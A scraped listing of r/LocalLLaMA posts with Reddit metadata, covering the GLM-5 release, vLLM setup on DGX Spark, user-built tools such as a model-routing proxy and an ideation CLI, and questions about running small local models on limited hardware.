GLM 5 was the only one that caught it. | 2026-02-11T18:41:13 | Top-Cardiologist1011 | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r25oym | false | null | t3_1r25oym | /r/LocalLLaMA/comments/1r25oym/glm_5_vs_claude_opus_46_vs_gpt52_i_asked_a_simple/ | false | false | default | 4 | {'enabled': True, 'images': [{'id': 'w2qxvliqtwig1', 'resolutions': [{'height': 60, 'url': 'https://preview.redd.it/w2qxvliqtwig1.png?width=108&crop=smart&auto=webp&s=c0fda3a94c2b548e306634aa92c2b986dfbe3c1e', 'width': 108}, {'height': 121, 'url': 'https://preview.redd.it/w2qxvliqtwig1.png?width=216&crop=smart&auto=webp&s=3bbdf40a546c2c4a39d2b85ae4dcbbdb9abcb150', 'width': 216}, {'height': 180, 'url': 'https://preview.redd.it/w2qxvliqtwig1.png?width=320&crop=smart&auto=webp&s=ee1675a98c361d4acece7e6c117f136dcaa023ef', 'width': 320}, {'height': 360, 'url': 'https://preview.redd.it/w2qxvliqtwig1.png?width=640&crop=smart&auto=webp&s=0cc51bc035e146dd6c31f07e498c56b3ce726619', 'width': 640}, {'height': 540, 'url': 'https://preview.redd.it/w2qxvliqtwig1.png?width=960&crop=smart&auto=webp&s=4b764d3849129a61b2bdacaade21a8d5cf7b2de3', 'width': 960}, {'height': 607, 'url': 'https://preview.redd.it/w2qxvliqtwig1.png?width=1080&crop=smart&auto=webp&s=2290ea05d3deb8de2c72050072a780dbd515fe44', 'width': 1080}], 'source': {'height': 2160, 'url': 'https://preview.redd.it/w2qxvliqtwig1.png?auto=webp&s=eb955f33e898f100bff7ff9be518d18a6d502766', 'width': 3840}, 'variants': {}}]} | |
The hunt continues ... | 72 | Tbf it did work with Deep Thinking enabled | 2026-02-11T18:38:03 | Lzlxlclvlblnlmao | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r25lvf | false | null | t3_1r25lvf | /r/LocalLLaMA/comments/1r25lvf/the_hunt_continues/ | false | false | default | 72 | {'enabled': True, 'images': [{'id': 'f8zp85xrtwig1', 'resolutions': [{'height': 46, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=108&crop=smart&auto=webp&s=c6a04d15fd1d872a132c62ec4f7f6d8ebe4c409b', 'width': 108}, {'height': 92, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=216&crop=smart&auto=webp&s=42a1d5700ed41bb859b65a86c78667bde3943c0b', 'width': 216}, {'height': 137, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=320&crop=smart&auto=webp&s=8e3ab1312948b27f44e14432fc8968c27d1ff35d', 'width': 320}, {'height': 275, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=640&crop=smart&auto=webp&s=e054a1ad8e41fd415e85050a1e4cfd4a37da628a', 'width': 640}, {'height': 412, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=960&crop=smart&auto=webp&s=e58ec0b5f77d6650e4dc739ea89e6831998f307f', 'width': 960}, {'height': 464, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=1080&crop=smart&auto=webp&s=9a55c848e82a3e854943a215178ae64e3c10f7a9', 'width': 1080}], 'source': {'height': 822, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?auto=webp&s=8c3db5052501590acc8f8e957ec8d441aefc8c7b', 'width': 1913}, 'variants': {}}]} | |
So no GLM 5 for the Pro Plan?? Can you confirm | 0 | is GLM 5 included in the pro plan of GLM Coding?? It seems it is not acording to the followin. Can somebody confirm. It does make since to me to go for GLM MAX plan for coding only where I can use claude code, claude app, and cowork as well
https://preview.redd.it/kneg6ozitwig1.png?width=2894&format=png&auto=webp&s=4848f7c8565af584d34a821403f14d116166c2b1
| 2026-02-11T18:37:09 | https://www.reddit.com/r/LocalLLaMA/comments/1r25kz5/so_no_glm_5_for_the_pro_plan_can_you_confirm/ | Abdullah_ATA | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r25kz5 | false | null | t3_1r25kz5 | /r/LocalLLaMA/comments/1r25kz5/so_no_glm_5_for_the_pro_plan_can_you_confirm/ | false | false | 0 | null | |
GLM-5 thinks it is DeepSeek-V3 on first prompt | 0 | 2026-02-11T18:36:43 | https://www.reddit.com/r/LocalLLaMA/comments/1r25kky/glm5_thinks_it_is_deepseekv3_on_first_prompt/ | Lorelabbestia | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r25kky | false | null | t3_1r25kky | /r/LocalLLaMA/comments/1r25kky/glm5_thinks_it_is_deepseekv3_on_first_prompt/ | false | false | 0 | null | ||
finally got my local agent to remember stuff between sessions | 23 | been running llama 3.3 70b locally for months but the memory reset every time was driving me nuts. tried a bunch of hacks, saving context to files, using vector dbs, even wrote my own janky sqlite thing.
then i started digging into proper memory architectures. spent last weekend implementing a hierarchical memory system inspired by how human memory actually works. short term flows into working memory, then gets consolidated into long term storage.
the difference is honestly wild. my coding assistant now remembers our entire project structure, past bugs we fixed, even my coding preferences. no more explaining the same architecture every single session.
tested it with the 70B on my 3090. memory retrieval adds maybe \~50ms latency but saves me from repeating context that would easily eat 10k+ tokens every time.
while poking around discord i stumbled across some discussion about a Memory Genesis Competition. apparently a lot of people are hitting the same wall around persistent memory, which was oddly reassuring.
the real breakthrough for me wasn’t just storing chat history. it’s selective consolidation, deciding what’s actually worth keeping long term vs what can safely fade. once that clicked, everything else started to make sense.
at this point the memory system feels way more important than swapping models again. | 2026-02-11T18:28:35 | https://www.reddit.com/r/LocalLLaMA/comments/1r25chl/finally_got_my_local_agent_to_remember_stuff/ | AlbatrossUpset9476 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r25chl | false | null | t3_1r25chl | /r/LocalLLaMA/comments/1r25chl/finally_got_my_local_agent_to_remember_stuff/ | false | false | self | 23 | null |
is pony alpha really glm 5, because glm 5 is out already on open router and it is still available on OR? | 0 | What is pony alpha then if both glm 5 and pony alpha are on Open router? Maybe they will remove pony alpha soon, if it is glm 5! | 2026-02-11T18:18:57 | https://www.reddit.com/r/LocalLLaMA/comments/1r252jk/is_pony_alpha_really_glm_5_because_glm_5_is_out/ | power97992 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r252jk | false | null | t3_1r252jk | /r/LocalLLaMA/comments/1r252jk/is_pony_alpha_really_glm_5_because_glm_5_is_out/ | false | false | self | 0 | null |
vllm on nvidia dgx spark | 2 | Want to set up one of two brand new dgx spark,
later when the 200gb link cable arrived, I want them run in a cluster.
I am new to vllm, have come from ollama => llama.cpp
Tried to run vllm under docker step by step with the nvidia documentation.
[https://build.nvidia.com/spark/vllm/instructions](https://build.nvidia.com/spark/vllm/instructions)
This worked for the documented example
\--------------------------------------------------------------------
docker run -it --gpus all -p 8000:8000 \\
[nvcr.io/nvidia/vllm:${LATEST\_VLLM\_VERSION}](http://nvcr.io/nvidia/vllm:${LATEST_VLLM_VERSION}) \\
vllm serve "Qwen/Qwen2.5-Math-1.5B-Instruct"
\--------------------------------------------------------------------
But any other model did not, tried it with several qwen3.
Even when it loaded successfully I did not receive any curl response (rejected).
1) I'd really apppreciate working commands/examples helping me in figuring out the correct parameters. Has anyone qwen-next-coder-instruct-fp8 running under vllm?
2) The vllm version provided by nvidia looks a little bit outdated. So I tried to install a fresh non-docker install under pip and under uv according to available documnetation. Both failed. 1st with missing wheel during compilation, 2nd from the official vllm docu. Are the actuals repositories broken? How do others proceed?
I can go with llama.cpp, but would like cluster two dgx with step-3,5 aoon. Here is vllm the better choice.
| 2026-02-11T18:12:46 | https://www.reddit.com/r/LocalLLaMA/comments/1r24w8w/vllm_on_nvidia_dgx_spark/ | Impossible_Art9151 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r24w8w | false | null | t3_1r24w8w | /r/LocalLLaMA/comments/1r24w8w/vllm_on_nvidia_dgx_spark/ | false | false | self | 2 | {'enabled': False, 'images': [{'id': 'gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc', 'resolutions': [{'height': 56, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=108&crop=smart&auto=webp&s=ae9a0b364ed46787f39eed33a84dbd6d41b7493d', 'width': 108}, {'height': 113, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=216&crop=smart&auto=webp&s=3248ecb24a87368115d7dc5a20595897b770e388', 'width': 216}, {'height': 168, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=320&crop=smart&auto=webp&s=91731aa3c35ff0d208722fa6dc0275e285dda386', 'width': 320}, {'height': 336, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=640&crop=smart&auto=webp&s=93cd7ed8b75bfcb19130e28beebd7322a7e89a5a', 'width': 640}, {'height': 504, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=960&crop=smart&auto=webp&s=75bb5d4df7b9f81b824f9488f17b3df47c408a89', 'width': 960}, {'height': 567, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=1080&crop=smart&auto=webp&s=5903a143841e25f04a02056b5ed84484135bfb15', 'width': 1080}], 'source': {'height': 630, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?auto=webp&s=e1ebb1fb5ce772f7fa2447458a16ab66f8c06c76', 'width': 1200}, 'variants': {}}]} |
I built a local proxy to save 90% on OpenClaw/Cursor API costs by auto-routing requests | 0 | Hey everyone,
I realized I was wasting money using Claude 3.5 Sonnet for simple "hello world" or "fix this typo" requests in OpenClaw. So I built **ClawRoute**.
It's a local proxy server that sits between your editor (OpenClaw, Cursor, VS Code) and the LLM providers.
**How it works:**
1. Intercepts the request (strictly local, no data leaves your machine)
2. Uses a fast local heuristic to classify complexity (Simple vs Complex)
3. Routes simple tasks to cheap models (Gemini Flash, Haiku) and complex ones to SOTA models
4. **Result:** Savings of \~60-90% on average in my testing.
**v1.1 Update:**
* New Glassmorphism Dashboard
* Real-time savings tracker
* "Dry Run" mode to test safe routing without changing models
* Built with Hono + Node.js (TypeScript)
It's 100% open source. Would love feedback! [ClawRoute](https://github.com/atharv404/ClawRoute) | 2026-02-11T18:11:54 | https://www.reddit.com/r/LocalLLaMA/comments/1r24vbz/i_built_a_local_proxy_to_save_90_on/ | 0xatharv | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r24vbz | false | null | t3_1r24vbz | /r/LocalLLaMA/comments/1r24vbz/i_built_a_local_proxy_to_save_90_on/ | false | false | self | 0 | null |
HLE is a strange test? | 0 | I noticed that HLE always get better as the model parameter count gets bigger,I saw no moderate sized models ever reaching any point of high score, isn't the exam depending on "reasoning" not "knowledge"? GLM-4.7 was a huge jump,but after it upscaled the size similar to Kimi K2.5 it scored even higher, like the score on HLE always grows linearly when parameters count gets higher. | 2026-02-11T18:11:09 | https://www.reddit.com/r/LocalLLaMA/comments/1r24uma/hle_is_a_strange_test/ | perfect-finetune | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r24uma | false | null | t3_1r24uma | /r/LocalLLaMA/comments/1r24uma/hle_is_a_strange_test/ | false | false | self | 0 | null |
one simple but difficult test prompt | 0 | Inspired by the pelican svg test from Simon Willison, I usually use the following simple but difficult prompt to test the LLMs. when using this test prompt LLM is not allowed to use search tools just in case it finds the solution online. most LLMs fail. have fun.
The test prompt:
generate a rectangle made of a set of tangram in svg
following are analysis of the prompt by claude:
That's a nice, deceptively simple prompt! Here's what it tests:
**Geometric/spatial reasoning** — Tangrams have 7 specific pieces (2 large triangles, 1 medium triangle, 2 small triangles, 1 square, 1 parallelogram) with fixed proportional relationships. The model needs to know this and figure out how to arrange them into a rectangle, which requires genuine spatial problem-solving.
**Mathematical precision** — Getting the coordinates right so the pieces actually fit together with no gaps or overlaps demands accurate calculation. The pieces have irrational dimensions (√2 shows up constantly), so the model has to handle that cleanly.
**SVG fluency** — The model needs to produce valid SVG markup with correct polygon points, and ideally make it visually clear (distinct colors, proper viewBox, etc.).
**Constraint satisfaction** — All 7 pieces must be used exactly once, they must tile perfectly, and the result must be a rectangle. This is a multi-constraint problem where getting one piece wrong cascades into everything else being off.
**Knowledge recall vs. reasoning** — A model might "know" standard tangram arrangements from training data, or it might have to reason through the geometry from scratch. This tests whether it can do either reliably.
**Where models typically fail:**
* Pieces overlap or leave gaps (most common failure)
* Wrong number of pieces or wrong proportions
* The pieces don't actually form a rectangle when you render the SVG
* Coordinates are slightly off due to floating-point sloppiness with √2
It's a good discriminator because it looks easy but requires the intersection of spatial reasoning, math, and code generation to all work simultaneously. A model that can nail this is doing something non-trivial. You could make it even harder by specifying "use each of the 7 standard tangram pieces exactly once" explicitly, or asking for a non-standard shape like a cat or a swan.
| 2026-02-11T18:08:06 | https://www.reddit.com/r/LocalLLaMA/comments/1r24rfx/one_simple_but_difficult_test_prompt/ | Ok-Coat-1895 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r24rfx | false | null | t3_1r24rfx | /r/LocalLLaMA/comments/1r24rfx/one_simple_but_difficult_test_prompt/ | false | false | self | 0 | null |
We built an MCP server with 26 tools that lets LLMs do multi-step health data analysis. Here's the architecture | 3 | The platform will be entering beta in the next few weeks with OpenAI/Anthropic as providers, but after beta we'll be exposing the MCP server via API token — so you'll be able to point your local models (Llama, Mistral, etc.) at the full 26-tool suite and run queries against your own health data without going through a cloud LLM! | 2026-02-11T17:56:56 | https://blog.getomn.io/posts/why-we-built-an-mcp-server-for-health-data/ | ultraHQ | blog.getomn.io | 1970-01-01T00:00:00 | 0 | {} | 1r24ft3 | false | null | t3_1r24ft3 | /r/LocalLLaMA/comments/1r24ft3/we_built_an_mcp_server_with_26_tools_that_lets/ | false | false | default | 3 | null |
GLM 5 is already on huggingface! | 68 | [https://huggingface.co/zai-org/GLM-5](https://huggingface.co/zai-org/GLM-5) | 2026-02-11T17:49:30 | https://www.reddit.com/r/LocalLLaMA/comments/1r248cj/glm_5_is_already_on_huggingface/ | oiuht54 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r248cj | false | null | t3_1r248cj | /r/LocalLLaMA/comments/1r248cj/glm_5_is_already_on_huggingface/ | false | false | self | 68 | null |
Recommendations for SLM on RTX 3050TI | 1 | Hi, I have a constrained hardware stack to run local models. I know but I cannot upgrade.
\- RTX 3050 TI - 4GB Vram
\- Intel Corporation Alder Lake-P GT1 \[UHD Graphics\]
\- 32 GB Ram
\- 12th Gen Intel Core i7-12650Hx 10 Cores
\- Debian Trixie
\- Coding needs: Debug, architecture, recommend, generate, mainly python. I'm a Backedn developer so I'm not solving great coding challenges.
So I need to locally run an agentic coding model due to NDA and utmost insatidfaction with antigravity. Also I find fun to run local model.
I have wondered around and read that GTP-OSS is good for condig, and due to my constraints I'd think of a 20b version.
But also I prefer to avoid a generalist model, or a distilled version of a foundation model. I prefer a model trained on large codebases.
Just for info, I know I can "delegate" part of the GPU load to CPU, yes, downgrading token speed by 10Xs. But is ok.
And also read in iGPU documentation that "It features 768 shading units, 48 texture mapping units and 24 ROPs.". So what if both GPUs can share the load as well as CPU?
Indeed Intel Alder-Lake is pretty decent, via thunderbolt 4, I connected two additional screens without any issue.
So, based in your knowledge and experience, what are your recommendations to run one or two good SLMs just for coding? Please remember that the intended use is exclusive as coding agents. | 2026-02-11T17:45:03 | https://www.reddit.com/r/LocalLLaMA/comments/1r243s1/recommendations_for_slm_on_rtx_3050ti/ | johnmacleod99 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r243s1 | false | null | t3_1r243s1 | /r/LocalLLaMA/comments/1r243s1/recommendations_for_slm_on_rtx_3050ti/ | false | false | self | 1 | null |
Tested GLM 5: Great model | 14 | Seems to be the same model as Pony Alpha from the responses, but better! | 2026-02-11T17:44:34 | https://v.redd.it/t1g8s0j7kwig1 | sirjoaco | /r/LocalLLaMA/comments/1r243bg/tested_glm_5_great_model/ | 1970-01-01T00:00:00 | 0 | {} | 1r243bg | false | null | t3_1r243bg | /r/LocalLLaMA/comments/1r243bg/tested_glm_5_great_model/ | false | false | 14 | {'enabled': False, 'images': [{'id': 'bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz', 'resolutions': [{'height': 61, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=108&crop=smart&format=pjpg&auto=webp&s=05304752bd1e8595ac1c4bbcda60409e75a02afd', 'width': 108}, {'height': 123, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=216&crop=smart&format=pjpg&auto=webp&s=6356ed82c13905c414893b437446ab6579e0d8f0', 'width': 216}, {'height': 182, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=320&crop=smart&format=pjpg&auto=webp&s=e0b2fcd7e4e624930054e0b7fe83f4808b928ea3', 'width': 320}, {'height': 365, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=640&crop=smart&format=pjpg&auto=webp&s=4bb7aa15ebd32cb8f3339719ec6c42b2d5b0bae2', 'width': 640}, {'height': 547, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=960&crop=smart&format=pjpg&auto=webp&s=a75ae47e7aa4d64151848b39948dae3f2c41cdea', 'width': 960}, {'height': 616, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=1080&crop=smart&format=pjpg&auto=webp&s=8e553858f199eea9c70ed0d42f2a6d05c6f39dc7', 'width': 1080}], 'source': {'height': 1722, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?format=pjpg&auto=webp&s=57af7d4ca94bfe4f6232e574734f4debad0f49c9', 'width': 3018}, 'variants': {}}]} | |
I'm 19 and self learning: Built a CLI tool for structured ideation using local LLMs (Ollama/MLX) - First ever project, looking for feedback :) | 0 | # Built my first project: A CLI tool that turns vague ideas into structured concepts using local LLMs
**TL;DR:** Self-taught 19yo dev here. Built a tool that takes "I want to build an app" and asks the right questions until you have a clear problem statement, target audience, and differentiation strategy. Works completely offline with Ollama/MLX. Looking for critique and opportunities to learn.
---
## The Problem I Was Trying to Solve
Ever notice how most side projects die because the idea was too vague to begin with?
*"I want to build a language learning app"* sounds like an idea, but it's missing everything: who it's for, what specific problem it solves, why it's different from Duolingo, and whether you even care enough to finish it.
I built **ideanator** to systematically uncover what's missing through structured questioning.
---
## How It Works
The tool runs a 4-phase framework I called **ARISE** (Anchor → Reveal → Imagine → Scope):
1. **Vagueness Scorer** analyzes your idea and identifies what's missing (motivation, audience, problem, etc.)
2. **Structured Questioning** asks targeted questions phase-by-phase to fill those gaps
3. **Refactoring Engine** transforms the conversation into a clean, faithful idea statement
Here's what the output looks like after a conversation:
```
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
REFINED IDEA STATEMENT
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
ONE-LINER: I'm building a conversational Spanish practice tool
for college students who find Duolingo too gamified and not
focused enough on real dialogue.
PROBLEM: College students trying to learn conversational Spanish
hit a wall — existing apps drill vocabulary but never simulate
actual conversations.
DIFFERENTIATOR: Unlike Duolingo and Babbel which sort by
grammar level, this matches on conversational ability and
focuses exclusively on dialogue — no flashcards, no points.
OPEN QUESTIONS:
• How would you measure conversational improvement?
• What's the minimum viable conversation scenario?
VALIDATION: confidence=0.87 | refinement rounds=0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
```
---
## What I Built
**Tech Stack:**
- Python 3.11+
- Works with Ollama, MLX (Apple Silicon), or any OpenAI-compatible API
- Completely offline/local LLM support
- 162 tests with full mock client coverage
**Key Features:**
- **Inverted Vagueness Scorer** - Uses prompt engineering to identify missing dimensions
- **Anti-Generic Question Check** - Detects and flags generic questions that could apply to any idea
- **Three-Stage Refactoring Engine** - Extract → Synthesize → Validate with self-refinement loop
- **Cross-platform** - Works on macOS, Linux, Windows
**Architecture highlights:**
- Backend-agnostic LLM abstraction layer
- Smart server lifecycle management (only starts if not running)
- Batch mode for testing multiple ideas
- Full prompt customization system
---
## My Background
I'm 19, teaching myself AI/ML development. This is my **first real project** — before this, I'd only done tutorials and small scripts.
I have spent almost a year now experimenting with AI
- Learning how the basics of coding
- Understanding prompt engineering deeply enough to properly use coding agents
- Understanding the behaviours of LLMs and what they do well in and where they fail
---
## What I'm Looking For
**Critique:**
- Is the architecture sound? (I'm self-taught, so I probably did things wrong)
- How's the code quality? Be brutal.
- Is the problem worth solving, or am I building a solution looking for a problem?
- MAJOR: Could I ever use GRPO to finetune an SLM to do a similar thing (specifically ask effective questions)
**Opportunities:**
- Internships or apprenticeships where I can learn from experienced devs
- Open source projects that need contributors
- Mentorship on what to learn next
I'm trying to prove I can build real things and learn fast. This project is evidence of work ethic, and if you met me you will know very quickly if i want something i will work as hard as i can to get it — I would just greatly benefit with a chance to grow in a professional environment and get my foot out the door
Please do try it :) Thank you for reading :) | 2026-02-11T17:43:58 | https://www.reddit.com/r/LocalLLaMA/comments/1r242ot/im_19_and_self_learning_built_a_cli_tool_for/ | Any-Wish-943 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r242ot | false | null | t3_1r242ot | /r/LocalLLaMA/comments/1r242ot/im_19_and_self_learning_built_a_cli_tool_for/ | false | false | self | 0 | {'enabled': False, 'images': [{'id': '-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=108&crop=smart&auto=webp&s=de799ef3fb2a25b34dd21eb83dd182b825171299', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=216&crop=smart&auto=webp&s=53fd780a584c496b01021b8dd6ead5c0f0191fe4', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=320&crop=smart&auto=webp&s=c95866171f374a20f539cb52d84bd3de4dbfff45', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=640&crop=smart&auto=webp&s=2138df369879cb3c69c0614b2bad23245995c48d', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=960&crop=smart&auto=webp&s=71351b726c3e5ded62c981521e76e1919a290708', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=1080&crop=smart&auto=webp&s=e36aa802ecdc68c8ea37f6fde683100daf4ad24f', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?auto=webp&s=eadf4d38cc6be09a687aea0bb96ed224ae7b23c1', 'width': 1200}, 'variants': {}}]} |
Openclaw with Small local model | 0 | Does anyone run clawdbot/openclaw with a small model like tinyllama or any other small model in local. Because virtual machine have small specs (I'm trying to run clawdbot on Oracle VM). I want to use clawdbot mainly on webscraping can i do it with this kind of model. | 2026-02-11T17:43:30 | https://www.reddit.com/r/LocalLLaMA/comments/1r24264/openclaw_with_small_local_model/ | Chathura_Lanarol | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r24264 | false | null | t3_1r24264 | /r/LocalLLaMA/comments/1r24264/openclaw_with_small_local_model/ | false | false | self | 0 | null |
zai-org/GLM-5 · Hugging Face | 144 | 2026-02-11T17:39:19 | https://huggingface.co/zai-org/GLM-5 | TellMeAboutGoodManga | huggingface.co | 1970-01-01T00:00:00 | 0 | {} | 1r23xsm | false | null | t3_1r23xsm | /r/LocalLLaMA/comments/1r23xsm/zaiorgglm5_hugging_face/ | false | false | default | 144 | null | |
zai-org/GLM-5 · Hugging Face | 2 | from Z.ai:
We are launching GLM-5, targeting complex systems engineering and long-horizon agentic tasks. Scaling is still one of the most important ways to improve the intelligence efficiency of Artificial General Intelligence (AGI). Compared to GLM-4.5, GLM-5 scales from 355B parameters (32B active) to 744B parameters (40B active), and increases pre-training data from 23T to 28.5T tokens. GLM-5 also integrates DeepSeek Sparse Attention (DSA), largely reducing deployment cost while preserving long-context capacity.
Reinforcement learning aims to bridge the gap between competence and excellence in pre-trained models. However, deploying it at scale for LLMs is a challenge due to the RL training inefficiency. To this end, we developed [slime](https://github.com/THUDM/slime), a novel **asynchronous RL infrastructure** that substantially improves training throughput and efficiency, enabling more fine-grained post-training iterations. With advances in both pre-training and post-training, GLM-5 delivers significant improvement compared to GLM-4.7 across a wide range of academic benchmarks and achieves best-in-class performance among all open-source models in the world on reasoning, coding, and agentic tasks, closing the gap with frontier models. | 2026-02-11T17:37:44 | https://huggingface.co/zai-org/GLM-5 | jacek2023 | huggingface.co | 1970-01-01T00:00:00 | 0 | {} | 1r23w7v | false | null | t3_1r23w7v | /r/LocalLLaMA/comments/1r23w7v/zaiorgglm5_hugging_face/ | false | false | default | 2 | null |
Both Zhipu and MiniMax have released new models, it seems they're getting ready for the holiday | 4 | 2026-02-11T17:37:40 | https://www.reddit.com/r/LocalLLaMA/comments/1r23w5j/both_zhipu_and_minimax_have_released_new_models/ | Intelligent_Front701 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r23w5j | false | null | t3_1r23w5j | /r/LocalLLaMA/comments/1r23w5j/both_zhipu_and_minimax_have_released_new_models/ | false | false | 4 | null | ||
How do I properly install LM Studio on my PC? | 0 | Hi, I am new to localllms and have just installed LM Studio, Windows GUI edition, my specs are Tiny 11, Dell Precision t1600, 2nd gen i7 cpu, Gtx 1050 ti 8gb vram, and 16gb ram. I tried installing phi-4-mini model but the error message "No LM Runtime found for model format 'gguf'" appears each time I would like to know how to fix it and if you could recommend a better suited model for my pc? | 2026-02-11T17:21:43 | https://www.reddit.com/r/LocalLLaMA/comments/1r23fxs/how_do_i_properly_install_lm_studio_on_my_pc/ | hjalgid47 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r23fxs | false | null | t3_1r23fxs | /r/LocalLLaMA/comments/1r23fxs/how_do_i_properly_install_lm_studio_on_my_pc/ | false | false | self | 0 | null |
I built a workflow tool for running multiple or custom agents for coding -- Now with local model support [X-POST LocalLLM] | 2 | It’s hard to keep up with all the new AI goodies: BEADS, Skills, Ralph Wiggum, BMad, the newest MCP etc. There’s not really a “golden” pattern yet. More importantly when I do find a flow I like, it’s not like I want to use it for every single task. Not everything’s a nail, and we need more tools than just a hammer.
So I built a tool that lets me create custom workflows, and it’s been pretty powerful for me. You can combine multiple agents together with commands, approvals, and more. CEL allows you to inject messages from different agents into other’s contexts, or conditional route to different nodes and sub workflows. Basically Cursor meets N8N (at least that’s the goal). When starting a chat you can select different workflows, or even allow the LLM to route to different workflows itself.
I’m pretty pleased with the result, with my favorite workflow being a custom checklist that has a toggle in the UI for me to “enable” different paths in the workflow itself.
# Enabled Patterns
**Custom Agents**
What’s cool is we provide the building blocks to create an agent: call\_llm, save\_message, execute tools, compact, and loop. So the basic chat in Reliant is just modeled via a yaml file.
Even the inputs aren’t hardcoded in our system. So with that you can create a custom agent that might leverage multiple LLM calls, or add custom approvals. We have a couple examples on our github for tool output filtering to preserve context, and in-flight auditing.
**Pairing Agents**
You can also pair agents in custom ways. The checklist and tdd workflows are the best examples of that. There’s a few thread models we support:
New, fork, and inherit (share). Workflows can also pass messages to each other.
**More complicated workflows**
The best is when you create a workflow tailored to your code. Our checklist will make sure lints and tests pass before handing off to a code reviewer agent. We might add another agent to clean up debug logs, and plan files. We’re using this to enforce cleaner code across our team, no matter the dev’s skill level.
You can also spawn parallel agents (in multiple worktrees if you prefer), to parallelize tasks.
We support creating workflows via our custom workflow builder agent, a drag and drop UI, or you can config-as-code with yaml files.
**Agent-spawned workflows**
Agents themselves can spawn workflows. And our system is a bit unique, where we allow you to pause the flow and interact with individual threads so that the sub-agents aren’t an opaque black box (this works for both agent-spawned and sub-workflows).
# Other Features
**Everything you need for parallel development**
Git worktrees are pretty standard these days, but we also have a full file editor, terminals, browser, and git-log scoped to your current worktree. You can also branch chats to different worktrees on demand which has been super helpful for my productivity to split things out when I need to.
**Generic presets act as agents**
One of the areas I want some feedback on. Instead of creating an “agent” we have a concept of grouped inputs (which typically map to an “agent” persona like a reviewer), but allow you to have presets for more parameter types.
